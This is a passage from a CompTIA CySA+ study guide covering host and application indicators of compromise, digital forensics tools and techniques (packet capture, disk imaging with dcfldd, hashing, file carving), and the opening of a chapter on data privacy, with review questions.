suspicion because often there is no reason to use a non-standard port unless you are trying to obscure what you are doing. It is also a way of evading ACLs that block traffic on the default standard ports. Be aware, though, that running a common protocol over a non-standard port is also used legitimately to deflect DoS attacks aimed at default standard ports by shifting a well-known service to a non-standard port number. So it is a technique used by both sides.
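A display filter in Wireshark or tshark can surface this condition. The following sketch flags HTTP traffic that is not on port 80 (adjust the protocol and port for your environment):

tshark -r capture.pcap -Y "http and not tcp.port == 80"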
HOST-RELATED INDICATORS
OF COMPROMISE
While many indicators of compromise are network
related, some are indications that something is wrong at
the system or host level. These are behaviors of a single
system or host rather than network symptoms.
Processor Consumption
When the processor is very busy with very little or
nothing running to generate the activity, it could be a
sign that the processor is working on behalf of malicious
software. Processor consumption was covered in Chapter
13, “The Importance of Proactive Threat Hunting.”
Memory Consumption
Another key indicator of a compromised host is
increased memory consumption. Memory consumption
was also covered in Chapter 13.
Drive Capacity Consumption
Available disk space on the host decreasing for no
apparent reason is cause for concern. It could be that the
host is storing information to be transmitted at a later
time. Some malware also causes an increase in drive
availability due to deleting files. Finally, in some cases,
the purpose is to fill the drive as part of a DoS or DDoS
attack. One of the difficult aspects of this is that the drive
is typically filled with files that are hidden from normal view. When users report a sudden filling of their hard
drive and even a slow buildup over time that cannot be
accounted for, you should scan the device for malware in
Safe Mode. Scanning with multiple products is advised
as well.
Unauthorized Software
The presence of any unauthorized software should
be another red flag. If you have invested in a
vulnerability scanner, you can use it to create a list of
installed software that can be compared to a list of
authorized software. Unfortunately, many types of
malware do a great job of escaping detection.
One of the ways to prevent unauthorized software is
through the use of Windows AppLocker. By using this
tool, you can create a whitelist, which specifies the only applications that are allowed, or you can create a blacklist, which specifies the applications that cannot be run.
Figure 17-4 shows a Windows AppLocker rule being
created. This particular rule is based on the path to the
application, but it could also be based on the publisher of
the application or on a hash value of the application file.
This particular rule is set to allow the application in the
path, but it could also be set to deny that application.
Once the policy is created, it can be applied as widely as
desired in the Active Directory infrastructure.
Figure 17-4 Create Executable Rules
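AppLocker rules can also be generated from PowerShell. The following is a minimal sketch, assuming the scanned directory and output path shown here:

Get-AppLockerFileInformation -Directory "C:\Program Files" -Recurse |
New-AppLockerPolicy -RuleType Publisher, Hash -User Everyone -Xml |
Out-File "C:\Policies\AppLocker.xml"

This gathers file information from the directory, builds publisher and hash rules for those files, and writes the resulting policy to an XML file that can then be imported into Group Policy.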
The following are additional general guidelines for
preventing unwanted software:
• Keep the granting of administrative privileges to a
minimum.
• Audit the presence and use of applications.
(AppLocker can do this.)
Malicious Process
Malicious programs use processes to access the CPU, just
as normal programs do. This means their processes are
considered malicious processes. You can sometimes
locate processes that are using either CPU or memory by
using Task Manager, but again, many malware programs
don’t show up in Task Manager. Either Process Explorer
or some other tool may give better results than Task
Manager. If you locate an offending process and end that
process, don’t forget that the program is still there, and
you need to locate it and delete all of its associated files
and registry entries.
Unauthorized Change
If an organization has a robust change control process,
there should be no unauthorized changes made to
devices. Whenever a user reports an unauthorized
change in his device, it should be investigated. Many
malicious programs make changes that may be apparent
to the user. Missing files, modified files, new menu
options, strange error messages, and odd system
behavior are all indications of unauthorized changes.
Unauthorized Privilege
Unauthorized changes can be the result of privilege
escalation. Check all system accounts for changes to the
permissions and rights that should be assigned, paying
special attention to new accounts with administrative
privileges. When assigning permissions, always exercise
the concept of least privilege. Also ensure that account
reviews take place on a regular basis to identify privileges
that have been escalated and accounts that are no longer
needed.
Data Exfiltration
Data exfiltration is the theft of data from a device.
Any reports of missing or deleted data should be
investigated. In some cases, the data may still be present,
but it has been copied and transmitted to the attacker.
Software tools are available to help track the movement
of data in transmissions.
Abnormal OS Process Behavior
When an operating system is behaving strangely and not
operating normally, it could be that the operating system
needs to be reinstalled or that it has been compromised
by malware in some way. While all operating systems
occasionally have issues, persistent issues or issues that
are typically not seen or have never been seen could
indicate a compromised operating system.
File System Change or Anomaly
If files change unexpectedly, especially system files (those that are part of the operating system), it is not a good sign. Outside of patches and updates, system files should not change after the operating system is installed, and if they do, it is an indication of malicious activity. Many systems offer the
ability to verify the integrity of system files. For example,
the System File Checker (SFC) is a utility built into the
Windows 10 operating system that will check for and
repair operating system file corruption.
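SFC is run from an elevated command prompt:

sfc /scannow

This command verifies all protected system files and replaces any corrupted versions it finds.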
Registry Change or Anomaly
Most registry changes are made indirectly, using tools such as Control Panel; changes are rarely made directly to the registry using the Registry Editor. Changes to
registry settings are common when a compromise has
occurred. Changes to the registry are not obvious and
can remain hidden for long periods of time. You need
tools to help identify infected settings in the registry and
to identify the last saved settings. Examples include
Microsoft’s Sysinternals Autoruns and Silent
Runners.vbs.
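For example, the console version of Autoruns can export autostart entries, including registry run keys, to a CSV file that can be compared against a known-good baseline (the output file name is illustrative):

autorunsc -accepteula -a * -c > autoruns-current.csv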
Unauthorized Scheduled Task
In some cases, malware can generate a task that is
scheduled to occur on a regular basis, like
communicating back to the hacker at certain intervals or
copying file locations at certain intervals. Any scheduled
task that was not configured by the local team is a sign of
compromise. Access to Scheduled Tasks can be
controlled through the use of Group Policy.
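Scheduled tasks can be enumerated for review with the built-in schtasks utility:

schtasks /query /fo LIST /v

Compare the verbose output against the tasks your team has documented; anything unexplained deserves investigation.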
APPLICATION-RELATED
INDICATORS OF
COMPROMISE
In some cases, symptoms are not present on the network
or in the activities of the host operating system, but they
are present in the behavior displayed by a compromised
application. Some of these indicators are covered in the
following sections.
Anomalous Activity
When an application is behaving strangely and not
operating normally, it could be that the application needs
to be reinstalled or that it has been compromised by
malware in some way. While all applications occasionally
have issues, persistent issues or issues that are typically
not seen or have never been seen could indicate a
compromised application.
Introduction of New Accounts
Some applications have their own account database. In
that case, you may find accounts that didn’t previously
exist in the database—and this should be a cause for
alarm and investigation. Many application compromises
create accounts with administrative access for the use of
a malicious individual or for the processes operating on
his behalf.
Unexpected Output
When the output from a program is not what is normally
expected and when dialog boxes are altered or the order
in which the boxes are displayed is not correct, it is an
indication that the application has been altered. Reports
of strange output should be investigated.
Unexpected Outbound
Communication
Any unexpected outbound traffic should be investigated,
regardless of whether it was discovered as a result of
network monitoring or as a result of monitoring the host
or application. With regard to the application, it can
mean that data is being transmitted back to the
malicious individual.
Service Interruption
When an application stops functioning with no apparent
problem, or when an application cannot seem to
communicate in the case of a distributed application, it
can be a sign of a compromised application. Any such
interruptions that cannot be traced to an application,
host, or network failure should be investigated.
Application Log
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” covered the event logs in
Windows. One of those event logs is dedicated to errors
and issues related to applications, the Application log.
This log focuses on the operation of Windows
applications. Events in this log are classified as error,
warning, or information, depending on the severity of
the event. The Application log in Windows 10 is shown in
Figure 17-5.
Figure 17-5 Application Log
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 17-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 17-2 Key Topics for Chapter 17
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
indicators of compromise (IoCs)
beaconing
traditional botnet
peer-to-peer botnet
wireless key loggers
rogue device
wireless intrusion prevention system (WIPS)
ping sweeps
port scans
vulnerability scans
uncredentialed scan
data exfiltration
Application log
REVIEW QUESTIONS
1. __________________ refers to traffic that
leaves a network at regular intervals.
2. List at least two network-related IoCs.
3. Match the following terms with their definitions.
4. The ____________________ focuses on the
operation of Windows applications.
5. List at least two host-related IoCs.
6. Match the following terms with their definitions.
7. _________________ enables you to look at the
graphs that are similar to Task Manager and
identify what caused spikes in the past, which is
not possible with Task Manager alone.
8. List at least two application-related IoCs.
9. Match the following terms with their definitions.
10. A(n) ______________________ is a scan in
which the scanner lacks administrative privileges
on the device it is scanning.
Chapter 18. Utilizing Basic
Digital Forensics
Techniques
This chapter covers the following topics related
to Objective 4.4 (Given a scenario, utilize basic
digital forensics techniques) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Network: Covers network protocol analyzing
tools including Wireshark and tcpdump
• Endpoint: Discusses disk and memory digital
forensics
• Mobile: Covers mobile forensics techniques
• Cloud: Includes forensic techniques in the cloud
• Virtualization: Covers issues and forensics
unique to virtualization
• Legal hold: Describes the legal concept of
retaining information for legal purposes
• Procedures: Covers forensic procedures
• Hashing: Describes forensic verification,
including changes to binaries
• Carving: Describes the process of carving that
allows the recovery of files
• Data acquisition: Covers data acquisition
processes
Over time, techniques have been developed to perform a
forensic examination of a compromised system or
network. Security professionals should use these time-tested processes to guide the approach to gathering
digital evidence. This chapter explores many of these
basic techniques.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 18-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 18-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a packet analyzer?
a. Wireshark
b. FTK
c. Helix
d. Cain and Abel
2. Which of the following is a password cracking tool?
a. Wireshark
b. FTK
c. Helix
d. Cain and Abel
3. Which of the following is a data acquisition tool?
a. MD5
b. EnCase
c. Cellebrite
d. dd
4. Which of the following is not true of the cloud-based approach to vulnerability scanning?
a. Installation costs are lower than with a premises-based solution.
b. Maintenance costs are higher than with a premises-based solution.
c. Upgrades are included in a subscription.
d. It does not require the client to provide onsite
equipment.
5. Which of the following is false with respect to using
forensic tools for the virtual environment?
a. The same tools can be used as in a physical
environment.
b. Knowledge of the files that make up a VM is
critical.
c. It requires deep knowledge of the log files created by the various components.
d. It requires access to the hypervisor code.
6. Which of the following often requires that
organizations maintain archived data for longer
periods?
a. Chain of custody
b. Lawful intercept
c. Legal hold
d. Discovery
7. Which of the following items in a digital forensic investigation suite is used to make copies of a hard drive?
a. Imaging utilities
b. Analysis utilities
c. Hashing utilities
d. Password crackers
8. Which of the following is the strongest hashing
utility?
a. MD5
b. MD6
c. SHA-1
d. SHA-3
9. Which of the following types of file carving is not
supported by Forensic Explorer?
a. Cluster-based file carving
b. Sector-based file carving
c. Byte-based file carving
d. Partition-based file carving
10. Which of the following is a data acquisition tool for
smartphones?
a. MD5
b. EnCase
c. Cellebrite
d. dd
FOUNDATION TOPICS
NETWORK
During both environmental reconnaissance testing and
when performing forensic investigations, security
analysts have a number of tools at their disposal, and it’s
no coincidence that many of them are the same tools that
hackers use. The following sections cover the most
common network tools and describe the types of
information you can determine about the security of the
environment by using each tool.
Wireshark
A packet (or protocol) analyzer can be a standalone
device or software running on a laptop computer. One of
the most widely used software-based protocol analyzers
is Wireshark. It captures raw packets off the interface
on which it is configured and allows you to examine each
packet. If the data is unencrypted, you can read the data.
Figure 18-1 shows an example of Wireshark in use. You
can use a protocol analyzer to capture traffic flowing
through a network switch by using the port mirroring
feature of a switch. You can then examine the captured
packets to discern the details of communication flows.
Figure 18-1 Wireshark
In the output shown in Figure 18-1, each line represents
a packet captured on the network. You can see the source
IP address, the destination IP address, the protocol in
use, and the information in the packet. For example, line
511 shows a packet from 10.68.26.15 to 10.68.16.127,
which is a NetBIOS name resolution query. Line 521
shows an HTTP packet from 10.68.26.46 to a server at
108.160.163.97. Just after that, you can see the server
sending an acknowledgment back. To read a packet, you
click the single packet. If the data is cleartext, you can
read and analyze it. So you can see how an attacker could
use Wireshark to acquire credentials and other sensitive
information. Protocol analyzers can be of help whenever
you need to see what is really happening on your
network. For example, say you have a security policy that
mandates certain types of traffic should be encrypted,
but you are not sure that everyone is complying with this
policy. By capturing and viewing the raw packets on the
network, you can determine whether users are
compliant.
Figure 18-2 shows additional output from Wireshark.
The top panel shows packets that have been captured.
The line numbered 384 has been chosen, and the parts of
the packet are shown in the middle pane. In this case, the
packet is a response from a DNS server to a device that
queried for a resolution. The bottom pane shows the
actual data in the packet and, because this packet is not
encrypted, you can see that the user was requesting the
IP address for www.cnn.com. Any packet not encrypted
can be read in this pane.
Figure 18-2 Analyzing Wireshark Output
During environmental reconnaissance testing, you can
use packet analyzers to identify traffic that is
unencrypted but should be encrypted (as previously
mentioned), protocols that should not be in use on the
network, and other abnormalities. You can also use these
tools to recognize certain types of attacks. Figure 18-3
shows Wireshark output which indicates that a SYN
flood attack is underway. Notice the lines highlighted in
gray. These are all SYN packets sent to 10.1.0.2, and they
are part of a SYN flood. Notice that the target device is
answering with RST/ACK packets, which indicates that
the port is closed (lines highlighted in red). One of the
SYN packets (highlighted in blue) is open, so you can
view its details in the bottom pane. You can expand this
pane and read the information from all four layers of the
TCP model. Currently the transport layer is expanded.
Figure 18-3 SYN Flood Displayed in Wireshark
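To isolate this kind of traffic yourself, a display filter such as the following sketch shows only initial SYN packets directed at the target, which makes a flood stand out (the address matches the example above):

tcp.flags.syn == 1 and tcp.flags.ack == 0 and ip.dst == 10.1.0.2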
tcpdump
tcpdump is a command-line tool that can capture
packets on Linux and Unix platforms. A version for
Windows, windump, is available as well. Using it is a
matter of selecting the correct parameter to go with the
tcpdump command. For example, the following
command enables a capture (-i) on the Ethernet 0
interface.
tcpdump -i eth0
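A slightly fuller sketch (interface, host, and file name are illustrative) captures traffic to and from a suspect host to a file for later analysis while excluding the analyst's own SSH session:

tcpdump -i eth0 -w suspect.pcap host 10.1.0.2 and not port 22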
To explore the many other switches that are available for
tcpdump, see www.tcpdump.org/tcpdump_man.html.
ENDPOINT
Forensic tools are used in the process of collecting
evidence during a cyber investigation. Many of these
tools are used to obtain evidence from endpoints.
Included in this category are forensic investigation
suites, hashing utilities, password cracking tools, and
imaging tools.
Disk
Many tools are dedicated to retrieving evidence from a
hard drive. Others are used to work with the data found
on the hard drive. The following tools are all related in
some form or fashion to obtaining evidence from a hard
drive.
FTK
Forensic Toolkit (FTK) is a commercial toolkit that
can scan a hard drive for all sorts of information. This kit
also includes an imaging tool and an MD5 hashing utility. It can locate relevant evidence, such as deleted e-mails, and it includes a password cracker and the ability to work with rainbow tables.
For more information on FTK, see https://accessdata.com/products-services/forensic-toolkit-ftk.
Helix3
Helix3 comes as a live CD that can be mounted on a
host without affecting the data on the host. From the live
CD you can acquire evidence and make drive images.
This product is sold on a subscription basis by e-fense. For more information on Helix3, see www.e-fense.com/products.php.
Password Cracking
In the process of executing a forensic investigation, it
may be necessary to crack passwords. Often files have
been encrypted or password protected by malicious
individuals, and you need to attempt to recover the
password. There are many, many password cracking
utilities out there; the following are two of the most
popular ones:
• John the Ripper: John the Ripper is a password
cracker that can work in Unix/Linux as well as
macOS systems. It detects weak Unix passwords,
though it supports hashes for many other
platforms as well. John the Ripper is available in
three versions: an official free version, a
community-enhanced version (with many
contributed patches but not as much quality
assurance), and an inexpensive pro version. One
mitigation for this attack is the Hash Suite for
Windows.
• Cain and Abel: One of the most well-known
password cracking programs, Cain and Abel can
recover passwords by sniffing the network; crack
encrypted passwords using dictionary, brute-force, and cryptanalysis attacks; record VoIP
conversations; decode scrambled passwords;
reveal password boxes; uncover cached
passwords; and analyze routing protocols. Figure
18-4 shows sample output from this tool. As you
can see, an array of attacks can be performed on
each located account. This example shows a scan
of the local machine for user accounts in which
the program has located three accounts: Admin,
Sharpy, and JSmith. By right-clicking the Admin
account, you can use the program to perform a
brute-force attack—or a number of other attacks—
on that account.
Figure 18-4 Cain and Abel
Imaging
Before you perform any analysis on a target disk in an
investigation, you should make a bit-level image of the
disk so that you can conduct the analysis on that copy.
Therefore, a forensic imaging utility should be part of
your toolkit. There are many forensic imaging utilities,
and many of the forensic investigation suites contain
them. Moreover, many commercial forensic workstations
have these utilities already loaded.
The dd command is a Linux command that is used to convert and copy files. The U.S. Department of Defense
created a fork (a variation) of this command called
dcfldd that adds additional forensic functionality. By
simply using dd with the proper parameters and the
correct syntax, you can make an image of a disk, but
dcfldd enables you to also generate a hash of the source
disk at the same time. For example, the following
command reads 5 GB from the source drive and writes
that to a file called myimage.dd.aa:
dcfldd if=/dev/sourcedrive hash=md5,sha256 hashwindow=5G \
md5log=hashmd5.txt sha256log=hashsha.txt \
hashconv=after bs=512 conv=noerror,sync \
split=5G splitformat=aa of=myimage.dd
This example also calculates the MD5 hash and the SHA-256 hash of each 5-GB chunk. It then reads the next 5 GB
and names that myimage.dd.ab. The MD5 hashes are
stored in a file called hashmd5.txt, and the SHA-256
hashes are stored in a file called hashsha.txt. The block
size for transferring has been set to 512 bytes, and in the
event of read errors, dcfldd writes zeros.
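If dcfldd is not available, a minimal sketch with plain dd and a separate hashing step (device and file names are placeholders) would be:

dd if=/dev/sdb of=evidence.dd bs=4M status=progress
sha256sum /dev/sdb evidence.dd

Hashing both the source device and the resulting image lets you confirm that the copy is bit-for-bit identical before analysis begins.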
Memory
Many penetration testing tools perform an operation
called a core dump or memory dump. Applications store
information in memory, and this information can
include sensitive data, passwords, usernames, and
encryption keys. Hackers can use memory-reading tools
to analyze the entire memory content used by an
application. Any vulnerability testing should take this
into consideration and utilize the same tools to identify
any issues in the memory of an application. The
following are some examples of memory-reading tools:
• Memdump: This free tool runs on Windows,
Linux, and Solaris. It simply creates a bit-by-bit
copy of the volatile memory on a system.
• KnTTools: This memory acquisition and analysis
tool used with Windows systems captures physical
memory and stores it to a removable drive or
sends it over the network to be archived on a
separate machine.
• FATKit: This popular memory forensic tool
automates the process of extracting interesting
data from volatile memory. FATKit helps an
analyst visualize the objects it finds to help in
understanding the data that the tool was able to
find.
Runtime debugging, on the other hand, is the process
of using a programming tool to not only identify
syntactic problems in code but also discover weaknesses
that can lead to memory leaks and buffer overflows.
Runtime debugging tools operate by examining and
monitoring the use of memory. These tools are specific to
the language in which the code was written. Table 18-2
shows examples of runtime debugging tools and the
operating systems and languages for which they can be
used.
Table 18-2 Runtime Debugging Tools
Memory dumping can help determine what a hacker
might be able to learn if she were able to cause a memory
dump. Runtime debugging would be the correct
approach for discovering syntactic problems in an
application’s code or to identify other issues, such as
memory leaks or potential buffer overflows.
MOBILE
As the use of mobile devices has increased, so has the
involvement of these devices in security incidents. The
following tools, among others, have been created to help
obtain evidence from mobile devices:
• Cellebrite: Cellebrite has found a niche by
focusing on collecting evidence from
smartphones. It makes extraction devices that can
be used in the field and software that does the
same things. These extraction devices collect
metadata from memory and attempt to access the
file system by bypassing the lock mechanism.
They don’t modify any of the data on the devices,
which makes this a forensically “clean” solution.
The device looks like a tablet, and you simply
connect a phone to it via USB. For more
information, see https://www.cellebrite.com.
• Susteen Secure View 4: This mobile forensic
tool is used by many police departments. It
enables users to fully export and report on all
information found on the mobile device. It can
create evidence reports based only on the
information that you find is relevant to your case.
This includes deleted data, all files (pictures,
videos, documents, etc.), messages, and more. See
https://www.secureview/secure_view.html for
details.
• MSAB XRY: This digital forensics and mobile
device forensics product by the Swedish company
MSAB is used to analyze and recover information
from mobile devices such as mobile phones,
smartphones, GPS navigation tools, and tablet
computers. Check out XRY at
https://www.msab.com/products/xry/.
CLOUD
In Chapter 4, “Analyzing Assessment Output,” you
learned about some cloud tools for vulnerability
assessments, and in Chapter 8, “Security Solutions for
Infrastructure Management,” you learned about cloud
anti-malware systems. Let’s look a bit more at cloud
vulnerability scanning.
Cloud-based vulnerability scanning is a service
performed from the vendor’s cloud and is a good
example of Software as a Service (SaaS). The benefits
here are the same as the benefits derived from any SaaS
offering—that is, no equipment on the part of the
subscriber and no footprint in the local network. Figure
18-5 shows a premises-based approach to vulnerability
scanning, and Figure 18-6 shows a cloud-based solution.
In the premises-based approach, the hardware and/or
software vulnerability scanners and associated
components are entirely installed on the client premises,
while in the cloud-based approach, the vulnerability
management platform is in the cloud. Vulnerability
scanners for external vulnerability assessments are
located at the solution provider’s site, with additional
scanners on the premises.
Figure 18-5 Premises-Based Scanning
Figure 18-6 Cloud-Based Scanning
The following are the advantages of the cloud-based
approach:
• Installation costs are low because there is no
installation and configuration for the client to
complete.
• Maintenance costs are low because there is only
one centralized component to maintain, and it is
maintained by the vendor (not the end client).
• Upgrades are included in a subscription.
• Costs are distributed among all customers.
• It does not require the client to provide onsite
equipment.
However, there is a considerable disadvantage to the
cloud-based approach: Whereas premises-based
deployments store data findings at the organization’s
site, in a cloud-based deployment, the data is resident
with the provider. This means the customer is dependent
on the provider to ensure the security of the vulnerability
data.
Qualys is an example of a cloud-based vulnerability
scanner. Sensors are placed throughout the network, and
they upload data to the cloud for analysis. Sensors can be
implemented as dedicated appliances or as software
instances on a host. A third option is to deploy sensors as
images on virtual machines.
VIRTUALIZATION
In Chapter 8, you learned the basics of virtualization and
how this technology is used in the cloud environment.
With respect to forensic tools for the virtual
environment, the same tools can be used as in a physical
environment. However, the key is knowledge of the files
that make up a VM and how to locate these files. Each
virtualization system has its own filenames and
architecture. Each VM is made up of several files.
Another key aspect of successful forensics in the virtual
environment is deep knowledge of the log files created by
the various components such as the hypervisor and the
guest machine. You need to know not only where these
files are located but also the purpose of each and how to
read and interpret its entries.
LEGAL HOLD
Legal holds are requirements placed on organizations by
legal authorities that require the organization to
maintain archived data for longer periods. Data on a
legal hold must be properly identified, and the
appropriate security controls must be put into place to
ensure that the data cannot be tampered with or deleted.
An organization should have policies regarding any legal
holds that may be in place.
Consider the following scenario: An administrator
receives a notification from the legal department that an
investigation is being performed on members of the
research department, and the legal department has
advised a legal hold on all documents for an unspecified
period of time. Most likely this legal hold will violate the
organization’s data storage policy and data retention
policy. If a situation like this arises, the IT staff should
take time to document the decision and ensure that the
appropriate steps are taken to ensure that the data is
retained and stored for a longer period, if needed.
PROCEDURES
In Chapter 16, “Applying the Appropriate Incident
Response Procedure,” you learned about the incident
response process and its steps. Review those steps as
they are important. This section introduces some case management tools that can make the process go more smoothly.
EnCase Forensic
EnCase Forensic is a case (incident) management tool
that offers built-in templates for specific types of
investigations. These templates are based on workflows,
which are the steps to carry out based on the
investigation type. A workflow leads you through the
steps of triage, collection, decryption, processing,
investigation, and reporting of an incident. For more
information, see
https://www.guidancesoftware.com/encase-forensic.
Sysinternals
Sysinternals is a suite of more than 70 Windows utilities, many of them command-line tools, that can be used for both troubleshooting and security issues. Among these are forensic tools. For more information, see https://technet.microsoft.com/en-us/sysinternals/.
Forensic Investigation Suite
A forensic investigation suite is a collection of tools
that are commonly used in digital forensic investigations.
A quality forensic investigation suite should include the
following items:
• Imaging utilities: One of the tasks you will be
performing is making copies of storage devices.
For this you need a disk imaging tool. To make
system images, you need to use a tool that creates
a bit-level copy of the system. In most cases, you
must isolate the system and remove it from
production to create this bit-level copy. You
should ensure that two copies of the image are
retained. One copy of the image will be stored to
ensure that an undamaged, accurate copy is
available as evidence. The other copy will be used
during the examination and analysis steps.
Message digests (or hashing digests) should be
used to ensure data integrity.
• Analysis utilities: You need a tool to analyze the
bit-level copy of the system that is created by the
imaging utility. Many of these tools are available
on the market. Often these tools are included in
forensic investigation suites and toolkits, such as
the previously introduced EnCase Forensic, FTK,
and Helix.
• Chain of custody: While hard copies of chain of
custody activities should be kept, some forensic
investigation suites contain software to help
manage this process. These tools can help you
maintain an accurate and legal chain of custody
for all evidence, with or without hard copy (paper)
backup. Some suites perform a dual electronic
signature capture that places both signatures in an
Excel spreadsheet as proof of transfer. Those
signatures are doubly encrypted so that if the
spreadsheet is altered in any way, the signatures
disappear.
• Hashing utilities: These utilities are covered in
the next section.
• OS and process analysis: These tools focus on
the activities of the operating system and the
processes that have been executed. While most
operating systems have tools of some sort that can
report on processes, tools included in a forensic
investigation suite have more robust features and
capabilities.
• Mobile device forensics: Today, many
incidents involve mobile devices. You need
different tools to acquire the required information
from these devices. A forensic investigation suite
should contain tools for this purpose. See the
earlier “Mobile” section for examples.
• Password crackers: Many times investigators
find passwords standing in the way of obtaining
evidence. Password cracking utilities are required
in such instances. Most forensic investigation
suites include several password cracking utilities
for this purpose. Chapter 4, “Analyzing Assessment Output,” lists some of these tools.
• Cryptography tools: An investigator uses these
tools when they encounter encrypted evidence,
which is becoming more common. Some of these
tools can attempt to decrypt the most common
types of encryption (for example, BitLocker,
BitLocker To Go, PGP, TrueCrypt), and they may
also be able to locate decryption keys from RAM
dumps and hibernation files.
• Log viewers: Finally, because much evidence can
be found in the logs located on the device, a robust
log reading utility is also valuable. A log viewer
should have the ability to read all Windows logs as
well as the registry. Moreover, it should also be
able to read logs created by other operating
systems. See the “Log Review” section of Chapter
11, “Analyzing Data as Part of Security Monitoring
Activities.”
HASHING
A hash function takes a message of variable length and
produces a fixed-length hash value. Hash values, also
referred to as message digests, are calculated using the
original message. If the receiver calculates a hash value
that is the same, the original message is intact. If the
receiver calculates a hash value that is different, then the
original message has been altered. Hashing was covered
in Chapter 8.
Hashing Utilities
You must be able to prove that certain evidence has not
been altered during your possession of it. Hashing
utilities use hashing algorithms to create a value that can
be used later to verify that the information is unchanged.
The two most common algorithms used are Message
Digest 5 (MD5) and Secure Hashing Algorithm (SHA).
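For example, an analyst can hash the acquired image once at collection time and re-hash the working copy later to confirm it is unchanged. The following is a minimal Python sketch of that check (the file names are hypothetical, and SHA-256 is used here simply as a modern member of the SHA family):

import hashlib

def file_digest(path, algorithm="sha256"):
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        # Read in chunks so large evidence images do not exhaust memory.
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

recorded = file_digest("evidence_original.img")  # digest stored at acquisition
working = file_digest("evidence_working.img")    # copy used for analysis
print("intact" if recorded == working else "ALTERED")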
Changes to Binaries
A binary file is a computer file that is not a text file; it must be interpreted by a program rather than read directly.
Executable files are often of this type. These file types
can be verified using hashing in the same manner as
described in the prior section.
CARVING
Data carving is a technique used when only fragments
of data are available and when no file system metadata is
available. It is a common procedure when performing
data recovery, after a storage device failure, for instance.
It is also used in forensics.
A file signature is a constant numerical or text value used
to identify a file format. The object of carving is to
identify the file based on this signature information
alone.
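As a simple illustration of the idea (not a substitute for a real carving tool such as Forensic Explorer, and with an abbreviated signature list), a Python sketch can scan a raw fragment for well-known magic bytes:

# A few common file signatures (magic bytes) and the formats they identify.
SIGNATURES = {
    b"\xff\xd8\xff": "JPEG header",
    b"\x89PNG\r\n\x1a\n": "PNG header",
    b"%PDF-": "PDF header",
}

def carve_offsets(path):
    data = open(path, "rb").read()  # acceptable for a small demo fragment
    for magic, name in SIGNATURES.items():
        offset = data.find(magic)
        while offset != -1:
            print(f"{name} candidate at byte offset {offset}")
            offset = data.find(magic, offset + 1)

carve_offsets("disk_fragment.bin")  # hypothetical raw fragment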
Forensic Explorer is a tool for the analysis of electronic
evidence and includes a data carving tool that searches
for signatures. It offers carving support for more than
300 file types. It supports
• Cluster-based file carving
• Sector-based file carving
• Byte-based file carving
Figure 18-7 shows the File Carving dialog box in Forensic
Explorer.
Figure 18-7 Forensic Explorer
DATA ACQUISITION
Earlier in this chapter, in the section “Forensic
Investigation Suite,” you learned about data acquisition
tools that should be a part of your forensic toolkit. Please
review that section and the balance of this chapter with
regard to forensic tools.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 18-3 lists a reference of these key topics and the
page numbers on which each is found.
Table 18-3 Key Topics in Chapter 18
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Wireshark
tcpdump
Forensic Toolkit (FTK)
Helix
John the Ripper
Cain and Abel
imaging
dd
Memdump
KnTTools
FATKit
runtime debugging
Cellebrite
Qualys
legal hold
EnCase Forensic
Sysinternals
forensic investigation suite
carving
REVIEW QUESTIONS
1. ___________________ is a command-line tool
that can capture packets on Linux and Unix
platforms.
2. List at least one password cracking utility.
3. Match the following terms with their definitions.
4. The DoD created a fork (a variation) of the dd
command called ___________ that adds
additional forensic functionality.
5. List at least two memory-reading tools.
6. Match the following terms with their definitions.
7. Cellebrite found a niche by focusing on collecting
evidence from ______________.
8. List at least two advantages of the cloud-based
approach to vulnerability scanning.
9. Match the following terms with their definitions.
10. _____________ often require that organizations
maintain archived data for longer periods.
Chapter 19. The
Importance of Data
Privacy and Protection
This chapter covers the following topics related
to Objective 5.1 (Understand the importance of
data privacy and protection) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Privacy vs. security: Compares these two
concepts as they relate to data privacy and
protection
• Non-technical controls: Describes
classification, ownership, retention, data types,
retention standards, confidentiality, legal
requirements, data sovereignty, data
minimization, purpose limitation, and non-disclosure agreement (NDA)
• Technical controls: Covers encryption, data
loss prevention (DLP), data masking,
deidentification, tokenization, digital rights
management (DRM), geographic access
requirements, and access controls
Addressing data privacy and protection issues has
become one of the biggest challenges facing
organizations that handle the information of employees,
customers, and vendors. This chapter explores those data
privacy and protection issues and describes the various
controls that can be applied to mitigate them. New data privacy laws that require new controls to protect data, such as the EU GDPR, are being enacted regularly.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks.” Table 19-1 lists the major headings
in this chapter and the “Do I Know This Already?” quiz
questions covering the material in those headings so that
you can assess your knowledge of these specific areas.
The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 19-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following relates to rights to control
the sharing and use of one’s personal information?
a. Security
b. Privacy
c. Integrity
d. Confidentiality
2. Which of the following is a risk assessment that
determines risks associated with PII collection?
a. MTA
b. PIA
c. RSA
d. SLA
